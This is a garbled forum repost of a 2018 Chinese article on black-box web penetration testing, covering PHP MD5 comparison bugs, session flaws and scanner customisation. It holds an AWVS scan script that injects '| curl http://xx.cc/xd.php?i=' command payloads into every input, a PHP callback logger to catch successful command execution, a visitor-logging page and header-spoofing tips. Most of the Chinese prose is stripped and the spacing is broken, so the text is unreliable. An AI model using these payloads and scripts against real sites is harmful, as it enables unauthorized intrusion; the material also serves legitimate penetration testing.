[12341] 2018-02-09_Web黑盒渗透思路之猜想

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2018-02-09_Web黑盒渗透思路之猜想 W e b   F r e e B u f   2 0 1 8 - 0 2 - 0 9 * F r e e B u f W E B 访 访 1 M D 5 P H P M D 5   P H P 5 ~ 7 B U G         0 E   0 0 E P H P   M D 5 0 e 2 S E S S I O N
S E S S I O N       s e s s i o n s e s s i o n     s e s s i o n s e s s i o n 访 访     s e s s i o n   访   P S   s y s t e m 1   0   M Y S Q L m y . i n i u s e r n a m e p a s s w d 1 0 m y . i n i 1 2 3 4 5 6 7 8 9 1   2     1 2 3 4 5 6 7 8 9 1   1 1 0 a d m i n X X a d m i n W E B     i f ( $ _ S E S S I O N [ ' u s e r ' ] ) {                 r e t u r n   T r u e ;         } s q l - m o d e = N O _ A U T O _ C R E A T E _ U S E R , N O _ E N G I N E _ S U B S T I T U T I O N c r e a t e   t a b l e   a d m i n ( u s e r n a m e   v a r c h a r ( 1 0 )   n o t   n u l l , p a s s w d   v a r c h a r ( 1 0 )   n o t   n u l l ) ; s q l - m o d e = N O _ A U T O _ C R E A T E _ U S E R , N O _ E N G I N E _ S U B S T I T U T I O N i n s e r t   i n t o   a d m i n   v a l u e s ( 1 2 3 4 5 6 7 8 9 1                   2 , ' 1 2 3 4 5 6 ' ) ;
B U R P A p p S c a n   1 2 v a l u e s S Q L 3 X S S 4       A W V S ( ) c m d . s c r i p t     |   c u r l   h t t p : / / x x . c c /     i _ u r l   Y R L v a l u e s S Q L X S S w e b s h e l l   v a r   t a r g e t U r l   =   n e w   T U R L ( s c a n U R L . u r l ) ; / /     v a r   s c h e m e   =   g e t C u r r e n t S c h e m e ( ) ; / /   H T T P v a r   h t t p   =   n e w   T H T T P J o b ( ) ; / /     H T T P s c h e m e . p o p u l a t e R e q u e s t ( h t t p ) ; h t t p _ t o p   =   h t t p . r e q u e s t ;   / / H T T P / / h t t p _ t o p . m s g 2   + h m s g 2   =   h t t p _ t o p . m s g 2 . r e p l a c e ( / & / g ,   " - " ) i _ u r l   =   s c a n U R L . h o s t P o r t + " / " + h m s g 2 ; / /   f o r   ( v a r   i = 0 ; i < s c h e m e . i n p u t C o u n t ;   i + + ) {         / /           v a r   v a r i a t i o n s   =   s c h e m e . s e l e c t V a r i a t i o n s F o r I n p u t ( i ) ;         f o r   ( v a r   j = 0 ;   j   <   v a r i a t i o n s . c o u n t ;   j + + )         {                         / /                           s c h e m e . l o a d V a r i a t i o n ( v a r i a t i o n s . i t e m ( j ) ) ;                         / /     < X S S >                         s c h e m e . s e t I n p u t V a l u e ( i ,   u n e s c a p e ( ' c u r l   h t t p : / / x x . c c / x d . p h p ? i = ' + i _ u r l ) ) ;                         / /   H T T P                         v a r   j o b   =   n e w   T H T T P J o b ( ) ;                         / /   t a r g e t u r l   U R L                         j o b . u r l   =   t a r g e t U r l ;                         / /                           s c h e m e . p o p u l a t e R e q u e s t ( j o b ) ;                         / /   H T T P                         j o b . e x e c u t e ( ) ;         } } / /   f o r   ( v a r   i = 0 ; i < s c h e m e . i n p u t C o u n t ;   i + + ) {         / /           v a r   v a r i a t i o n s   =   s c h e m e . s e l e c t V a r i a t i o n s F o r I n p u t ( i ) ;         f o r   ( v a r   j = 0 ;   j   <   v a r i a t i o n s . c o u n t ;   j + + )         {                         / /                           s c h e m e . l o a d V a r i a t i o n ( v a r i a t i o n s . i t e m ( j ) ) ;                         / /     < X S S >                         s c h e m e . s e t I n p u t V a l u e ( i ,   u n e s c a p e ( ' |   c u r l   h t t p : / / x x . c c / x d . p h p ? i = ' + i _ u r l ) ) ;                         / /   H T T P                         v a r   j o b   =   n e w   T H T T P J o b ( ) ;                         / /   t a r g e t u r l   U R L                         j o b . u r l   =   t a r g e t U r l ;                         / /                           s c h e m e . p o p u l a t e R e q u e s t ( j o b ) ;                         / /   H T T P                         j o b . e x e c u t e ( ) ;         } } / /   f o r   ( v a r   i = 0 ; i < s c h e m e . i n p u t C o u n t ;   i + + ) {         / /           v a r   v a r i a t i o n s   =   s c h e m e . s e l e c t V a r i a t i o n s F o r I n p u t ( i ) ;         f o r   ( v a r   j = 0 ;   j   <   v a r i a t i o n s . c o u n t ;   j + + )         {                         / /                           s c h e m e . l o a d V a r i a t i o n ( v a r i a t i o n s . i t e m ( j ) ) ;                         / /     < X S S >                         s c h e m e . s e t I n p u t V a l u e ( i ,   u n e s c a p e ( ' |   c u r l   h t t p : / / x x . c c / x d . p h p ? i = ' + i _ u r l + " % 2 3 " ) ) ;                         / /   H T T P                         v a r   j o b   =   n e w   T H T T P J o b ( ) ;                         / /   t a r g e t u r l   U R L                         j o b . u r l   =   t a r g e t U r l ;                         / /                           s c h e m e . p o p u l a t e R e q u e s t ( j o b ) ;                         / /   H T T P                         j o b . e x e c u t e ( ) ;         } } / /   f o r   ( v a r   i = 0 ; i < s c h e m e . i n p u t C o u n t ;   i + + ) {         / /           v a r   v a r i a t i o n s   =   s c h e m e . s e l e c t V a r i a t i o n s F o r I n p u t ( i ) ;         f o r   ( v a r   j = 0 ;   j   <   v a r i a t i o n s . c o u n t ;   j + + )         {                         / /                           s c h e m e . l o a d V a r i a t i o n ( v a r i a t i o n s . i t e m ( j ) ) ;                         / /     < X S S >                         s c h e m e . s e t I n p u t V a l u e ( i ,   u n e s c a p e ( '   |   c u r l   h t t p : / / x x . c c / x d . p h p ? i = ' + i _ u r l + " ) % 2 3 " ) ) ;                         / /   H T T P                         v a r   j o b   =   n e w   T H T T P J o b ( ) ;                         / /   t a r g e t u r l   U R L                         j o b . u r l   =   t a r g e t U r l ;                         / /                           s c h e m e . p o p u l a t e R e q u e s t ( j o b ) ;                         / /   H T T P                         j o b . e x e c u t e ( ) ;         } } / /   f o r   ( v a r   i = 0 ; i < s c h e m e . i n p u t C o u n t ;   i + + ) {         / /           v a r   v a r i a t i o n s   =   s c h e m e . s e l e c t V a r i a t i o n s F o r I n p u t ( i ) ;         f o r   ( v a r   j = 0 ;   j   <   v a r i a t i o n s . c o u n t ;   j + + )         {                         / /                           s c h e m e . l o a d V a r i a t i o n ( v a r i a t i o n s . i t e m ( j ) ) ;                         / /     < X S S >                         s c h e m e . s e t I n p u t V a l u e ( i ,   u n e s c a p e ( '   |   c u r l   h t t p : / / x x . c c / x d . p h p ? i = ' + i _ u r l + " ) ) % 2 3 " ) ) ;                         / /   H T T P                         v a r   j o b   =   n e w   T H T T P J o b ( ) ;                         / /   t a r g e t u r l   U R L                         j o b . u r l   =   t a r g e t U r l ;                         / /                           s c h e m e . p o p u l a t e R e q u e s t ( j o b ) ;                         / /   H T T P                         j o b . e x e c u t e ( ) ;         } } P H P x d . p h p < ? p h p       $ i p   =   $ _ S E R V E R [ " R E M O T E _ A D D R " ] ?   $ _ S E R V E R [ " R E M O T E _ A D D R " ]   :   " " ; i f ( $ i p ) { $ i   =   e m p t y ( $ _ G E T [ ' i ' ] ) ?   " "   :   $ _ G E T [ ' i ' ] ; $ t x t   =   h t m l s p e c i a l c h a r s ( $ i p . " - - - - - " . $ i . " r n " ) ; $ n a   =   f o p e n ( " x d . t x t " ,   " a + " ) ; $ x i e   =   f w r i t e ( $ n a ,   $ t x t ) ; } ? >       c m d _ i n s p e c t . s c r i p t   H T T P   / /   s c a n u r l . u r l U R L v a r   t a r g e t U r l   =   n e w   T U R L ( " h t t p : / / x x . c c / x d . t x t " ) ; v a r   h t t p   =   n e w   T H T T P J o b ( ) ; h t t p . u r l   =   t a r g e t U r l ; h t t p . v e r b   =   ' G E T ' ; / /   h t t p . e x e c u t e ( ) ; v a r   d z R e s   =   h t t p . r e s p o n s e . b o d y ;   / / H T T P i f ( d z R e s . i n d e x O f ( s c a n U R L . h o s t P o r t )   ! =   - 1 ) {                         l o g I n f o ( ' m e s s a g e : - - - - >   y u a n c h e n g m i n g l i n g z h i x i n g ! ! ' ) ; / /         v a r   r i   =   n e w   T R e p o r t I t e m ( ) ; / /           r i . L o a d F r o m F i l e ( " c m d . x m l " ) ;   / /         r i . a f f e c t s   =   " h t t p : / / x x . c c / x d . t x t " ;         r i . r e q u e s t   =   h t t p . r e q u e s t . t o S t r i n g ( ) ;   / / H T T P         r i . r e s p o n s e   =   h t t p . r e s p o n s e . b o d y ;   / / H T T P         r i . f u l l R e s p o n s e   =   h t t p . r e s p o n s e . b o d y ;   / / H T T P         / /           A d d R e p o r t I t e m ( r i ) ; / / }
w e b s h e l l   w e b s h e l l   W E B H T M L J S J S a j a x h t m l   i n p u t a j a x   i n p u t     J S   H T T P S   J S w w w . a a . c o m   ( C D N ) :     I P  
I P 6 9 . 1 0 3 I P 6 9 1 0 3 1 0 3 I P   C     M V C             U R L h t t p : / / w w w . a . c o m / 1 . p h p 1 p h p   2 H T M L   w i n d o w s l i n u x M A C     M A C   I P     I P I P I P C   W E B   W E B X S S     J S < ? p h p h e a d e r ( " C o n t e n t - t y p e :   t e x t / h t m l ;   c h a r s e t = g b 2 3 1 2 " ) ; i n c l u d e   ' . / 1 . h t m l ' ; $ h t t p   =   $ _ S E R V E R [ ' H T T P _ U S E R _ A G E N T ' ] ?   $ _ S E R V E R [ ' H T T P _ U S E R _ A G E N T ' ]   :   " " ; $ i p   =   $ _ S E R V E R [ " R E M O T E _ A D D R " ] ?   $ _ S E R V E R [ " R E M O T E _ A D D R " ]   :   " " ; $ t x t   =   h t m l s p e c i a l c h a r s ( $ i p . " - - - - - " . $ h t t p . " r n " ) ; $ n a   =   f o p e n ( " x d 2 . t x t " ,   " a + " ) ; $ x i e   =   f w r i t e ( $ n a ,   $ t x t ) ; ? >
A A   H T T P _ R E F E R E R   H O S T h t t p s : / / g i t h u b . c o m / x i n d o n g z h u a i z h u a i / h o s t _ i p / I P C   I P C   C   I P I P       I P     D D O S  
      z m a p     z m a p   t c p 3 z m a p V P S   I P   S S R F   X E E   P S   e x p e c t g e t s h e l l       5     U I   I P   A D M I N   I P         X - F O R W A R D E D - F O R P r o x y - C l i e n t - I P W L - P r o x y - C l i e n t - I P H T T P _ C L I E N T _ I P X - F o r w a r d e d - F o r I P
X S S I P I P s h e l l 访     1 4 广 P H P     2 0 M V C   1 0 访 访     W E B w e b s h e l l   1 C O O K I E C O O K I E
2           U R L         > > >   * F r e e B u f
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则